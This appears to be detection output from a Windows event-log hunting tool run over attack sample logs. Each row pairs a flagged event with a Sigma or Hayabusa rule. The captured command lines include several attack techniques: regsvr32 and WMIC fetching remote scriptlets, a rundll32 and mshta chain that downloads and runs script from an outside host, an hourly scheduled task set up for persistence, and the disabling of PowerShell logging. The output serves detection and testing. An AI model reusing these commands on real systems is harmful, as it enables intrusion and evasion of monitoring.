+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:18.833 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:18.833 +09:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:50:36.889 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
+2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
+2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,rules/sigma/process_creation/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
+2019-05-20 03:05:07.719 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
+2019-05-20 03:05:33.454 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
+2019-05-21 09:35:07.308 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.463 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.463 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.518 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:07.870 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.279 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:10.161 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 365ABB72-47BE-5CE3-0000-0010CF0C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-21 09:35:12.705 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.286 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.389 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:32:59.809 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:33:00.140 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 00:33:01.141 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
+2019-05-22 13:02:11.307 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
+2019-05-22 13:02:11.307 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:05.862 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:07.731 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
